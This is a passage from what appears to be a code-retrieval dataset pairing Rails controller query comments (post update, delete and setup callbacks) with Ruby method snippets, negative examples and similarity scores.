"def update\n respond_to do |format|\n if @post.update(post_params)\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @post.update(post_params)\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @post.update(post_params)\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @post.update(post_params)\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @post.update(post_params)\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @post.update(post_params)\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @post.update(post_params)\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find_by_slug(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n #@post = Post.find(params[:id])\n\n #respond_to do |format|\n # if @post.update_attributes(params[:post])\n # format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n # format.json { head :no_content }\n #else\n # format.html { render action: \"edit\" }\n # format.json { render json: @post.errors, status: :unprocessable_entity }\n #end\n #end\n end",
"def update\n respond_to do |format|\n if @patch.update(patch_params)\n format.html { redirect_to @patch, notice: 'Patch was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @patch.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update \n #this works largely the same, \n @post = Post.find(params[:id])\n @post.created_at = params[:created_at] if !!params[:created_at]\n if @post.update_attributes(params[:post])\n render \"show\", handlers: [:rabl]\n else\n render :json => @post.errors.full_messages, status: 422\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to \"/#{session[:username]}\", notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update?(post_params)\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n delete_caches\n end",
"def patch options\n rest_request({ method: :patch }.merge(options))\n end",
"def patch options\n rest_request({ method: :patch }.merge(options))\n end",
"def update\n update_resource_response(@post, blog_post_params)\n end",
"def update\n \n @previous_content = @post[:content]\n respond_to do |format|\n if @post.update_attributes(params[:post])\n \t\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n \n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n verify_owner_or_admin(@post)\n \n respond_to do |format|\n if @post.update(post_params)\n format.html { redirect_to @post, notice: \"Post was successfully updated.\" }\n format.json { render :show, status: :ok, location: @post }\n else\n format.html { render :edit, status: :unprocessable_entity }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @update = Update.find(params[:id])\n @post = @update.post\n\n respond_to do |format|\n if @update.update_attributes(params[:update])\n format.html { redirect_to @post, notice: 'Update was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @update.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n if @post.update(post_params)\n render json: {status: 1, id: @post.id.to_s, notice: \"修改成功,标题是:#{@post.title.capitalize}\", errors: []}\n else\n render json: {status: -1, notice: \"修改失败\", errors: @post.errors.fall_message}\n end\n end",
"def update\n params[:post][:tag_ids] ||= []\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to [@post.user, @post], notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\r\n @post = Post.find(params[:id])\r\n @root_post = root_post_of(@post)\r\n\r\n respond_to do |format|\r\n if @post.update_attributes(params[:post])\r\n @root_post.touch(:updated_at)\r\n update_child_posts(@post)\r\n\r\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\r\n format.json { head :no_content }\r\n else\r\n format.html { render action: \"edit\" }\r\n format.json { render json: @post.errors, status: :unprocessable_entity }\r\n end\r\n end\r\n end",
"def update\n @post.short_body = post_params[:body].split('</p>')[0] + '</p>'\n @post.tags.delete_all\n set_tags\n\n respond_to do |format|\n if @post.update(post_params)\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @post.update_attributes(post_params)\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { render :show, status: :ok, location: @post }\n else\n format.html { render :edit }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n render_forbidden and return unless can_edit?\n @post = Post.friendly.find(params[:id])\n \n respond_to do |format|\n if @post.update(post_params)\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n redirect_to root_path\n end\n end\n end",
"def update\n respond_to do |format|\n if @post.update(post_params)\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end"
] |
[
"0.7186324",
"0.7040601",
"0.677308",
"0.6765753",
"0.6668628",
"0.66481066",
"0.6577776",
"0.65553194",
"0.65502805",
"0.65495133",
"0.65345335",
"0.6529854",
"0.64982027",
"0.64969105",
"0.6467084",
"0.64304507",
"0.6428232",
"0.6426466",
"0.6425566",
"0.6419249",
"0.64181453",
"0.6411935",
"0.63997275",
"0.63997275",
"0.63894093",
"0.6381795",
"0.6369432",
"0.6369432",
"0.6369432",
"0.6369432",
"0.6369432",
"0.6369432",
"0.6369432",
"0.6369432",
"0.6369432",
"0.6369432",
"0.6369432",
"0.6369432",
"0.6369432",
"0.6369432",
"0.6369432",
"0.6369432",
"0.6369337",
"0.6359892",
"0.63594955",
"0.63580275",
"0.635544",
"0.635544",
"0.635544",
"0.635544",
"0.6347316",
"0.6338459",
"0.6337452",
"0.6332606",
"0.63279086",
"0.63192517",
"0.6307825",
"0.6294169",
"0.6289934",
"0.627602",
"0.62720805",
"0.6270453",
"0.62700033",
"0.6262321",
"0.62506497",
"0.6240972",
"0.62274104",
"0.6215559",
"0.62133217",
"0.62053937",
"0.62027586",
"0.62027586",
"0.62027586",
"0.62027586",
"0.62027586",
"0.62027586",
"0.62027586",
"0.62027586",
"0.62027586",
"0.62027586",
"0.6201748",
"0.6195721",
"0.6180375",
"0.6178203",
"0.61738944",
"0.6167035",
"0.6157961",
"0.6153888",
"0.61472106",
"0.61472106",
"0.6140896",
"0.6120805",
"0.6114453",
"0.61128646",
"0.6107943",
"0.610538",
"0.6103636",
"0.6097605",
"0.609677",
"0.60931516",
"0.6092766"
] |
0.0
|
-1
|
DELETE /posts/1
DELETE /posts/1.json
|
def destroy
@calendar = Calendar.find(params[:calendar_id])
@event = Event.find(params[:event_id])
@post = @event.posts.find(params[:id])
@post.destroy
respond_to do |format|
format.html { redirect_to [@calendar,@event], notice: 'Post was successfully destroyed.' }
format.json { head :no_content }
end
end
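
The lookup chain above (calendar → event → post) implies doubly nested resources. A minimal routing sketch consistent with those params, assuming a standard Rails config/routes.rb (hypothetical; the actual routes file is not part of this record):

Rails.application.routes.draw do
  # Nesting produces params[:calendar_id] and params[:event_id],
  # which the destroy action above uses to scope the post lookup.
  resources :calendars do
    resources :events do
      resources :posts
    end
  end
end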
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def delete\n render json: Post.delete(params[\"id\"])\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.json { head :no_content }\n end\n end",
"def destroy\n post = Post.find(params[:id])\n if post.destroy\n render json: {status: \"success\", data: {id: params[:id]}}, status: :ok\n end\n end",
"def destroy\n @post.destroy\n render json: {}, status: :ok\n end",
"def destroy\n if @post.destroy\n render json: {\n post: @post\n }, status: :ok\n else\n render status: :bad_request\n end\n end",
"def destroy\n @api_v2_post = Post.find(params[:id])\n @api_v2_post.destroy\n\n respond_to do |format|\n format.html { redirect_to api_v2_posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @api_v1_post.destroy\n respond_to do |format|\n format.html { redirect_to api_v1_posts_url, notice: 'Post was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n authenticated\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n # @post = Post.find(params[:id])\n # @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @post.destroy\n\n json_response(@post)\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n respond_with Post.destroy(params[:id])\n end",
"def destroy\n r = PostRepository.new\n @post = r.GetPost(\"PostID\", params[:id].to_i)\n r.delete @post\n\n respond_to do |format|\n format.html { redirect_to(posts_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.json { head :no_content }\n format.xml { head :no_content }\n end\n end",
"def destroy\n @api_post.destroy\n\n head :no_content\n end",
"def destroy\n @post.destroy\n render json: {\n data: {\n post: { key: @post.id },\n status: @post.status,\n }\n }\n end",
"def destroy\n\t\tpost = Post.find(params[:id])\n\t\t# byebug\n \tpost.destroy\n\t posts = Post.all\n \trender json: posts\n end",
"def destroy\r\n @post = Post.find(params[:id])\r\n @post.destroy\r\n\r\n respond_to do |format|\r\n format.html { redirect_to posts_url }\r\n format.json { head :no_content }\r\n end\r\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_path, notice: \"Post removed.\" }\n format.json { render 'destroy' }\n end\n end",
"def delete\n @post = Post.find(params[:id])\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_path(client_id:current_user.client.id, per_page:5), notice: 'Post was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to dashboard_index_path }\n format.json { head :no_content }\n end\n end",
"def destroy\n respond_with Post.destroy(params[:id])\n end",
"def destroy\r\n @post = Post.find(params[:id])\r\n @post.destroy\r\n\r\n respond_to do |format|\r\n format.html { redirect_to root_url }\r\n format.json { head :no_content }\r\n end\r\n end",
"def destroy\n @post.destroy\n\n head :no_content\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to '/admin/posts' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n\n render json: Post.all.as_json\n end",
"def destroy\n @post.destroy\n head :no_content\n end",
"def destroy\n @post.destroy\n head :no_content\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to blog_posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n @title = \"Kill Post\"\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to all_user_posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n head :no_content\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html {redirect_to posts_url, notice: 'Post was successfully destroyed.'}\n format.json {head 200}\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_path, notice: 'Post was successfully deleted.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n respond_with post.destroy(params[:id])\n end",
"def destroy\n @post.destroy\n \n respond_to do |format|\n format.html { redirect_to post_url, notice: 'Post was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def delete\n client.delete(\"/#{id}\")\n end",
"def destroy\n Post.find(params[:id]).delete\n\n redirect_to '/'\n end",
"def destroy\n # @post = Post.find(params[:id])\n #@post.destroy\n\n #respond_to do |format|\n # format.html { redirect_to posts_url }\n #format.json { head :no_content }\n #end\n end",
"def delete(url)\n raise Error, \"Missing URL\" unless url\n get('posts/delete?uri=' << u(url))\n nil\n end",
"def destroy\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to news_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @post = Post.find_by_slug(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url, notice: \"Anúncio removido com sucesso.\" }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.friendly.find(params[:id])\n @post.destroy\n respond_to do |format|\n format.html { redirect_to root_path, notice: 'Story deleted' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_url, notice: \"Postitus edukalt kustutatud!\" }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_url, notice: 'Postagem excluida com sucesso.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_url, notice: 'Postagem excluída com sucesso!' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @mural_post.destroy\n respond_to do |format|\n format.html { redirect_to mural_posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @posto = Posto.find(params[:id])\n @posto.destroy\n\n respond_to do |format|\n format.html { redirect_to postos_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @api_post.destroy\n end"
] |
[
"0.8046884",
"0.76902676",
"0.7583626",
"0.75803024",
"0.7568048",
"0.75047046",
"0.75031126",
"0.74750155",
"0.74671036",
"0.74650854",
"0.746482",
"0.74589694",
"0.74589694",
"0.74589694",
"0.74589694",
"0.74579465",
"0.74579465",
"0.74579465",
"0.74579465",
"0.74579465",
"0.74579465",
"0.74579465",
"0.74579465",
"0.74579465",
"0.74579465",
"0.74579465",
"0.74579465",
"0.74579465",
"0.74579465",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7423174",
"0.74059606",
"0.73990285",
"0.73928183",
"0.7389498",
"0.7371715",
"0.7371117",
"0.7349121",
"0.7344524",
"0.7342226",
"0.7338908",
"0.7313371",
"0.73123556",
"0.731156",
"0.73095584",
"0.7299751",
"0.7298017",
"0.7298017",
"0.7282874",
"0.7277125",
"0.7266815",
"0.7260945",
"0.72549784",
"0.7254856",
"0.7239102",
"0.7238946",
"0.7229726",
"0.7227931",
"0.7221013",
"0.721375",
"0.7211237",
"0.72097856",
"0.7190222",
"0.71850675",
"0.7171746",
"0.71533066",
"0.71457464",
"0.71434635",
"0.7142048",
"0.7139985",
"0.7137574"
] |
0.0
|
-1
|
Use callbacks to share common setup or constraints between actions.
|
def set_post
@post = Post.find(params[:id])
#@event = Event.find(params[:event_id])#
end
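
By itself, set_post never runs; it becomes shared setup only once it is registered as a callback. A minimal sketch of the usual wiring, assuming a conventional Rails controller (the enclosing class is not shown in this record):

class PostsController < ApplicationController
  # Run the shared lookup before every action that needs @post,
  # instead of repeating Post.find(params[:id]) in each one.
  before_action :set_post, only: [:show, :edit, :update, :destroy]

  private

  def set_post
    @post = Post.find(params[:id])
  end
end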
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def set_required_actions\n # TODO: check what fields change to asign required fields\n end",
"def action_hook; end",
"def run_actions; end",
"def define_action_hook; end",
"def actions; end",
"def define_action_helpers\n if super && action == :save\n @instance_helper_module.class_eval do\n define_method(:valid?) do |*args|\n self.class.state_machines.fire_event_attributes(self, :save, false) { super(*args) }\n end\n end\n end\n end",
"def add_actions; end",
"def callbacks; end",
"def callbacks; end",
"def setup *actions, &proc\n (@setup_procs ||= []) << [proc, actions.size > 0 ? actions : [:*]]\n end",
"def define_action_helpers; end",
"def post_setup\n end",
"def action_methods; end",
"def action_methods; end",
"def action_methods; end",
"def before_setup; end",
"def action_run\n end",
"def execute(setup)\n @action.call(setup)\n end",
"def define_action_helpers?; end",
"def set_actions\n actions :all\n end",
"def action_done(action)\n dispatch = { :migrate => :done_migrating, :map => :done_mapping, :reduce =>\n :done_reducing, :finalize => :done_finalizing } \n self.send dispatch[action[:action]], action\n end",
"def dependencies action, &block\n @actions.each do |other|\n if action[:requires].include? other[:provide]\n block.call other\n end\n end\n end",
"def setup!\n return unless @setup_procs\n http_actions = actions\n @setup_procs.each do |setup_proc|\n proc, actions = setup_proc\n @setup__actions = actions.map do |action|\n\n action.is_a?(Regexp) ?\n http_actions.select { |a| a.to_s =~ action } :\n action.is_a?(String) && action =~ /\\A\\./ ?\n http_actions.map { |a| a.to_s << action if format?(a).include?(action) }.compact :\n action\n\n end.flatten\n self.class_exec &proc\n @setup__actions = nil\n end\n @setup_procs = nil\n end",
"def before_actions(*logic)\n self.before_actions = logic\n end",
"def setup_handler\n end",
"def set_action(opts)\n opts = check_params(opts,[:actions])\n super(opts)\n end",
"def setup(action)\n @targets.clear\n unless action.item.target_filters.empty?\n @targets = SES::TargetManager.make_targets(action)\n else\n item = action.item\n if item.for_opponent?\n @targets = $game_troop.alive_members\n elsif item.for_dead_friend?\n @targets = $game_party.battle_members.select { |actor| actor.dead? }\n else\n $game_party.battle_members.select { |actor| actor.alive? }\n end\n end\n @item_max = @targets.size\n create_contents\n refresh\n show\n activate\n end",
"def action; end",
"def action; end",
"def action; end",
"def action; end",
"def action; end",
"def workflow\n end",
"def revisable_shared_setup(args, block)\n class << self\n attr_accessor :revisable_options\n end\n options = args.extract_options!\n self.revisable_options = Options.new(options, &block)\n \n self.send(:include, Common)\n self.send(:extend, Validations) unless self.revisable_options.no_validation_scoping?\n self.send(:include, WithoutScope::QuotedColumnConditions)\n end",
"def setup\n @action = SampleActionAndroid.new(os_name: 'android',\n app_name: APP_PATH)\n end",
"def before(action)\n invoke_callbacks *self.class.send(action).before\n end",
"def process_action(...)\n send_action(...)\n end",
"def before_dispatch(env); end",
"def after_actions(*logic)\n self.after_actions = logic\n end",
"def setup\n # override and do something appropriate\n end",
"def setup(client)\n return unless @setup\n actions = @setup['setup'].select { |action| action['do'] }.map { |action| Action.new(action['do']) }\n actions.each do |action|\n action.execute(client)\n end\n self\n end",
"def setup(_context)\n end",
"def setup(resources) ; end",
"def validate_actions\n errors.add(:base, :should_give_at_least_one_action) if !manage? && !forecasting? && !read? && !api?\n end",
"def setup\n @resource_config = {\n :callbacks => {\n :before_create => nil,\n :after_create => nil,\n :before_update => nil,\n :after_update => nil,\n :before_destroy => nil,\n :after_destroy => nil,\n },\n :child_assoc => nil,\n :model => nil,\n :parent => nil,\n :path => nil,\n :permission => {},\n :properties => {},\n :relation => {\n :create => nil,\n :delete => nil,\n },\n :roles => nil,\n }\n end",
"def determine_valid_action\n\n end",
"def process_shared\n handle_taxes\n handle_shippings\n create_adjustments_from_params\n handle_status\n handle_inventory_refunds\n handle_payment_transactions\n order.updater.update\n end",
"def startcompany(action)\n @done = true\n action.setup\n end",
"def init_actions\n am = action_manager()\n am.add_action(Action.new(\"&Disable selection\") { @selection_mode = :none; unbind_key(32); bind_key(32, :scroll_forward); } )\n am.add_action(Action.new(\"&Edit Toggle\") { @edit_toggle = !@edit_toggle; $status_message.value = \"Edit toggle is #{@edit_toggle}\" })\n end",
"def event_callbacks(event, metadata={})\n case event\n when :reset, :review\n if confirmed\n update_attributes(confirmed: false)\n end\n when :confirm\n confirm\n # trigger :order for all applicable items\n # NOTE: :order event is common to both physical and digital items\n items.each do |i|\n if i.event_permitted(:order)\n user_id = last_transition.user_id\n i.trigger!(:order, { order_id: id, user_id: user_id })\n end\n end\n when :complete_work\n request = metadata[:request]\n work_complete_notification(request)\n when :close\n close\n end\n if event != :close && !open\n reopen\n end\n end",
"def setup_action\n return unless PONY::ERRNO::check_sequence(current_act)\n new_sequence = @action_sequence[@sequence_index+1...@action_sequence.size]\n @sequence_index = 0\n new_sequence = DND::SkillSequence::ACTS[@acts[1]] + new_sequence\n execute_sequence\n end",
"def define_tasks\n define_weave_task\n connect_common_tasks\n end",
"def setup(&block)\n define_method(:setup, &block)\n end",
"def setup\n transition_to(:setup)\n end",
"def setup\n transition_to(:setup)\n end",
"def action\n end",
